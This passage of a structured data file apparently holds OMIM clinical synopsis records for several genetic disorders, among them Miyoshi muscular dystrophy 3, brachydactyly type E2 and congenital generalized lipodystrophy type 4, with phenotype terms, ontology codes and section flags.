'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613319,
'prefix': '#',
'preferredTitle': 'MIYOSHI MUSCULAR DYSTROPHY 3; MMD3',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'muscleSoftTissue': '''Distal muscle weakness {SNOMEDCT:249942005} {UMLS C0427065 HP:0002460} {HPO HP:0002460 C0427065,C1864696};\nInability to stand on tiptoes {UMLS C3150479};\nCalf muscle discomfort {UMLS C3150480};\nCalf muscle weakness {SNOMEDCT:309249007} {UMLS C0586738};\nCalf hypertrophy (early in the disease) {UMLS C3150481} {HPO HP:0008981 C1843057};\nCalf atrophy (later onset) {UMLS C3150482};\nHypertrophy of the extensor digitorum brevis muscles {UMLS C3150483};\nMRI shows fatty infiltration of affected muscles {UMLS C1864710};\nDifficulty running {SNOMEDCT:282479002} {UMLS C0560346 HP:0009046} {HPO HP:0009046 C0560346};\nDifficulty climbing stairs {SNOMEDCT:282195009} {UMLS C0239067 HP:0003551} {HPO HP:0003551 C0239067};\nDifficulty rising from chair {UMLS C3150484};\nProximal lower limb muscle weakness, upper and lower (later onset) {UMLS C3150485};\nQuadriceps atrophy (later onset) {UMLS C3150486};\nMuscle weakness and atrophy may be asymmetric {UMLS C3150487};\nDisruption of the sarcolemmal membrane seen on muscle biopsy {UMLS C3552741}''',
'laboratoryAbnormalities': 'Increased serum creatine kinase {UMLS C0241005 HP:0003236} {HPO HP:0003236 C0151576,C0241005}',
'miscellaneous': '''Onset age 20 to 51 years {UMLS C3150489};\nIndependent ambulation is maintained {UMLS C3150490};\nVariable severity {UMLS C1861403 HP:0003828} {HPO HP:0003828 C1861403,C1866862};\nFemale mutations carriers have a milder phenotype, with myalgia, calf hypertrophy, or isolated increased serum creatine kinase {UMLS C3552743};\nLimb-girdle muscular dystrophy type 2L (LGMD2L, {611307}) is an allelic disorder''',
'molecularBasis': 'Caused by mutation in the anoctamin 5 gene (ANO5, {608662.0004})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613376,
'prefix': '#',
'preferredTitle': 'NEURONOPATHY, DISTAL HEREDITARY MOTOR, TYPE IIC; HMN2C',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'muscleSoftTissue': '''Distal lower and upper limb muscle atrophy {UMLS C1848736 HP:0003693};\nAtrophy of the intrinsic foot and hand muscles {UMLS C3150622}''',
'neurologicPeripheralNervousSystem': '''Muscle weakness, distal {SNOMEDCT:249942005} {UMLS C0427065 HP:0002460} {HPO HP:0002460 C0427065,C1864696};\nDistal lower limb muscle weakness {UMLS C1836450 HP:0009053} {HPO HP:0009053 C1836450};\nDistal upper limb muscle weakness {UMLS C3150620 HP:0008959} {HPO HP:0008959 C3150620};\nSteppage gait {SNOMEDCT:27253007} {UMLS C0427149 HP:0003376} {HPO HP:0003376 C0427149};\nDifficulty walking {SNOMEDCT:719232003,228158008} {ICD9CM:719.7} {UMLS C0311394 HP:0002355} {HPO HP:0002355 C0311394};\nEMG shows neurogenic abnormalities {UMLS C1846832};\nNeurophysiologic studies show a predominantly motor neuropathy {UMLS C2750686};\nHyporeflexia of lower limbs {UMLS C1834696 HP:0002600} {HPO HP:0002600 C1834696};\nAreflexia of lower limbs {UMLS C1856694 HP:0002522} {HPO HP:0002522 C1856694};\nNo or mild distal sensory deficit {UMLS C3150621}''',
'miscellaneous': '''Onset in early twenties {UMLS C3150624};\nSlowly progressive {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nLower limb involvement occurs before upper limb involvement {UMLS C3150625};\nOne family has been reported {UMLS C2750513}''',
'molecularBasis': 'Caused by mutation in the heat-shock 27-kD protein 3 gene (HSPB3, {604624.0001}).',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613320,
'prefix': '#',
'preferredTitle': 'SPONDYLOMETAPHYSEAL DYSPLASIA, MEGARBANE-DAGHER-MELKI TYPE; SMDMDM',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Short stature, pre- and postnatal {UMLS C3150493}',
'growthWeight': 'Low birth weight {SNOMEDCT:267258002,276610007} {UMLS C0024032 HP:0001518} {HPO HP:0001518 C0024032,C0235991}',
'headAndNeckHead': '''Large fontanelles {SNOMEDCT:276709006} {UMLS C0456132 HP:0000239} {HPO HP:0000239 C0456132,C4072820,C4072821,C4072822};\nProminent forehead {UMLS C1837260 HP:0011220} {HPO HP:0011220 C1837260,C1867446} {EOM ID:510a51e4083c1d6f IMG:Forehead,Prominent-small.jpg}''',
'headAndNeckFace': 'Round face {UMLS C0239479 HP:0000311} {HPO HP:0000311 C0239479,C1856468} {EOM ID:a98d48239172dc71 IMG:Face,Round-small.jpg}',
'headAndNeckEars': '''Small ears {SNOMEDCT:35045004} {ICD10CM:Q17.2} {ICD9CM:744.23} {UMLS C0152423 HP:0008551} {HPO HP:0008551 C0152423};\nLow-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234}''',
'headAndNeckNose': '''Depressed nasal bridge {UMLS C1836542 HP:0005280} {HPO HP:0005280 C1836542,C3550546,C4280495} {EOM ID:000fb29123c16757 IMG:Nasal_Bridge,Depressed-small.jpg};\nShort nose {UMLS C1854114 HP:0003196} {HPO HP:0003196 C0426414,C1854114} {EOM ID:daeb9fb85b0b970f IMG:Nose,Short-small.jpg};\nWide nostrils {SNOMEDCT:399353008} {UMLS C0426440 HP:0009931};\nAnteverted nares {SNOMEDCT:708670007} {UMLS C1840077 HP:0000463} {HPO HP:0000463 C1840077} {EOM ID:d7284223e790d7aa IMG:Nares,Anteverted-small.jpg};\nIncreased nasal width {SNOMEDCT:249321001} {UMLS C0426421 HP:0000445} {HPO HP:0000445 C0426421}''',
'headAndNeckMouth': 'Deep philtrum {UMLS C1839797 HP:0002002} {HPO HP:0002002 C1839797,C4020861} {EOM ID:3c771454d4293f5e IMG:Philtrum,Deep-small.jpg}',
'headAndNeckNeck': 'Short neck {SNOMEDCT:95427009} {UMLS C0521525 HP:0000470} {HPO HP:0000470 C0521525} {EOM ID:c75e63fd749ec7a8 IMG:Neck,Short-small.jpg}',
'cardiovascularHeart': '''Cardiomegaly {SNOMEDCT:8186001} {ICD10CM:I51.7} {ICD9CM:429.3} {UMLS C0018800 HP:0001640} {HPO HP:0001640 C0018800};\nGlobal left ventricular hypokinesia {UMLS C4229844};\nRight atrium dilatation {UMLS C4229843};\nPulmonary hypertension {SNOMEDCT:70995007} {ICD10CM:I27.20} {UMLS C0020542,C1963220}''',
'respiratory': 'Tachypnea {SNOMEDCT:271823003} {ICD10CM:R06.82} {ICD9CM:786.06} {UMLS C0231835 HP:0002789} {HPO HP:0002789 C0231835}',
'chestExternalFeatures': '''Narrow chest {SNOMEDCT:249671009} {UMLS C0426790 HP:0000774} {HPO HP:0000774 C0426790};\nBell-shaped thorax {UMLS C1865186 HP:0001591} {HPO HP:0001591 C1865186}''',
'chestRibsSternumClaviclesAndScapulae': '''Short ribs {SNOMEDCT:249696007} {UMLS C0426817 HP:0000773} {HPO HP:0000773 C0426817};\nCupped end ribs {UMLS C3150492}''',
'abdomenExternalFeatures': 'Prominent abdomen {UMLS C1850290}',
'skeletal': 'Delayed bone age {SNOMEDCT:123983008} {UMLS C0541764 HP:0002750} {HPO HP:0002750 C0541764}',
'skeletalSkull': 'Wormian bones {SNOMEDCT:113194005} {UMLS C0222716 HP:0002645} {HPO HP:0002645 C0222716}',
'skeletalSpine': '''Severe platyspondyly {UMLS C1850293 HP:0004565} {HPO HP:0004565 C1850293};\nSlightly ovoid vertebrae {UMLS C4229848};\nPartial sacral agenesis {SNOMEDCT:253189008} {UMLS C0431414 HP:0008455} {HPO HP:0008455 C1851305};\nDecrease in interpedicular distance in the lumbar vertebrae {UMLS C4229846}''',
'skeletalPelvis': '''Square iliac bones {UMLS C1838186 HP:0003177} {HPO HP:0003177 C1838186};\nHorizontal acetabula with medial and lateral spurs {UMLS C3150495};\nHypoplastic ischia {UMLS C1859447 HP:0003175} {HPO HP:0003175 C1859447};\nLacy appearance of iliac crest {UMLS C1857186 HP:0008786} {HPO HP:0008786 C1857186};\nTrident acetabula {UMLS C3810182}''',
'skeletalLimbs': '''Short limbs {UMLS C0239399 HP:0009826} {HPO HP:0009826 C0239399};\nShort long bones {UMLS C1854912 HP:0003026};\nSlight widening of the distal femoral metaphyses {UMLS C3150496};\nAbsence of epiphyseal ossification of the knees {UMLS C3150497};\nAbnormal modeling of the long bones {UMLS C4229845};\nBowed femora {UMLS C1859461 HP:0002980};\nMetaphyseal cupping {UMLS C1837082 HP:0003021} {HPO HP:0003021 C1837082}''',
'neurologicCentralNervousSystem': '''Developmental delay {SNOMEDCT:248290002,224958001} {ICD10CM:F88} {ICD9CM:315.9} {UMLS C0424605,C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nAxial hypotonia {UMLS C1853743 HP:0008936} {HPO HP:0008936 C1853743}''',
'miscellaneous': '''Bone abnormalities improve with age {UMLS C3150498};\nReduced longevity {UMLS C4229841};\nTwo consanguineous Lebanese families have been reported (last curated March 2015) {UMLS C4229840}''',
'molecularBasis': 'Caused by mutation in the homolog of the S. cerevisiae presequence translocase-associated motor 16 gene (PAM16, {614336.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': True,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': True,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': True,
'skeletalSpineExists': True,
'skeletalPelvisExists': True,
'skeletalLimbsExists': True,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613382,
'prefix': '#',
'preferredTitle': 'BRACHYDACTYLY, TYPE E2; BDE2',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthHeight': 'Short stature {SNOMEDCT:422065006,237837007,237836003} {ICD10CM:R62.52,E34.3} {ICD9CM:783.43} {UMLS C0013336,C0349588,C2237041,C2919142 HP:0004322,HP:0003510} {HPO HP:0004322 C0349588}',
'headAndNeckTeeth': '''Delayed eruption, primary and secondary (in some patients) {UMLS C3150645};\nOligodontia (in some patients) {UMLS C3150646} {HPO HP:0000677 C4082304,C4280619}''',
'skeletalHands': 'Short metacarpals, III-V {UMLS C3150647}',
'skeletalFeet': 'Short metatarsals {UMLS C1849020 HP:0010743} {HPO HP:0010743 C1849020}',
'molecularBasis': 'Caused by mutation in the parathyroid hormone-like hormone gene (PTHLH, {168470.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': True,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': False,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613325,
'prefix': '#',
'preferredTitle': 'RHABDOID TUMOR PREDISPOSITION SYNDROME 2; RTPS2',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'neoplasia': '''Rhabdoid tumors, malignant {SNOMEDCT:83118000} {UMLS C0206743};\nSmall cell carcinoma of the ovary, hypercalcemic type {UMLS C4013716}''',
'miscellaneous': 'Increased risk of developing early-onset aggressive cancers {UMLS C4013718}',
'molecularBasis': 'Caused by mutation in the SWI/SNF-related, matrix-associated, actin-dependent regulator of chromatin, subfamily A, member 4 gene (SMARCA4, {603254.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': True,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613327,
'prefix': '#',
'preferredTitle': 'LIPODYSTROPHY, CONGENITAL GENERALIZED, TYPE 4; CGL4',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthOther': 'Failure to thrive {SNOMEDCT:54840006,433476000,432788009} {ICD10CM:R62.51} {ICD9CM:783.41} {UMLS C2315100,C0015544,C3887638 HP:0001508} {HPO HP:0001508 C0231246,C2315100}',
'cardiovascularHeart': '''Long QT syndrome {SNOMEDCT:111975006,9651007} {ICD10CM:I45.81} {ICD9CM:426.82} {UMLS C0023976,C0151878 HP:0001657} {HPO HP:0001657 C0151878};\nAtrial fibrillation {SNOMEDCT:164889003,49436004} {ICD9CM:427.31} {UMLS C0344434,C0004238,C2926591,C1963067 HP:0005110} {HPO HP:0005110 C0004238};\nArrhythmia {SNOMEDCT:698247007} {ICD10CM:I49.9} {ICD9CM:427,427.9} {UMLS C0003811 HP:0011675} {HPO HP:0011675 C0003811,C0264886,C0522055,C0855329,C1832603,C1842820};\nTachycardia {SNOMEDCT:86651002,3424008} {ICD10CM:R00.0} {ICD9CM:785.0} {UMLS C3827868,C0039231 HP:0001649} {HPO HP:0001649 C0039231,C4020868};\nBradycardia {SNOMEDCT:48867003} {ICD10CM:R00.1} {UMLS C0428977,C3812171 HP:0001662} {HPO HP:0001662 C0428977}''',
'abdomenExternalFeatures': '''Protruding abdomen {UMLS C1855750};\nProminent umbilicus {UMLS C1837795 HP:0001544} {HPO HP:0001544 C1837795}''',
'abdomenLiver': '''Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209};\nFatty liver {SNOMEDCT:197321007,442191002} {UMLS C0015695,C2711227 HP:0001397} {HPO HP:0001397 C2711227}''',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': '''Poor feeding {SNOMEDCT:78164000,299698007} {ICD10CM:R63.3} {UMLS C0576456,C0232466 HP:0011968} {HPO HP:0011968 C0232466};\nDysphagia {SNOMEDCT:40739000,288939007} {ICD10CM:R13.1,R13.10} {ICD9CM:787.2,787.20} {UMLS C0011168,C1560331 HP:0002015,HP:0200136} {HPO HP:0002015 C0011168};\nConstipation {SNOMEDCT:14760008} {ICD10CM:K59.0,K59.00} {ICD9CM:564.0,564.00} {UMLS C1963087,C0009806,C3641755,C4084722,C4084723,C4084724 HP:0002019} {HPO HP:0002019 C0009806,C0237326};\nIleus {SNOMEDCT:710572000} {UMLS C1560456,C4019039,C1258215 HP:0002595} {HPO HP:0002595 C1258215};\nEsophageal dilatation {SNOMEDCT:78974003,195565004} {ICD9CM:42.92} {UMLS C0740287,C0192389};\nEsophageal dysmotility {SNOMEDCT:79962008,266434009} {ICD10CM:K22.4} {ICD9CM:530.5} {UMLS C0014858,C0014863 HP:0025271};\nHypertrophic pyloric stenosis {SNOMEDCT:48644003} {ICD10CM:Q40.0} {ICD9CM:750.5} {UMLS C0700639};\nSmooth muscle hypertrophy in the gastrointestinal tract {UMLS C3150508}''',
'skeletal': '''Joint contractures {SNOMEDCT:7890003} {ICD10CM:M24.5} {ICD9CM:718.40,718.4} {UMLS C0009918 HP:0001371} {HPO HP:0001371 C0009917,C0009918,C0333068,C1850530};\nOsteopenia {SNOMEDCT:312894000,78441005} {UMLS C0029453 HP:0000938} {HPO HP:0000938 C0029453,C0747078};\nOsteoporosis {SNOMEDCT:64859006} {ICD10CM:Z82.62,M81.0} {ICD9CM:733.0,V17.81,733.00} {UMLS C4554622,C2911643,C0029456,C1962963 HP:0000939} {HPO HP:0000939 C0029456}''',
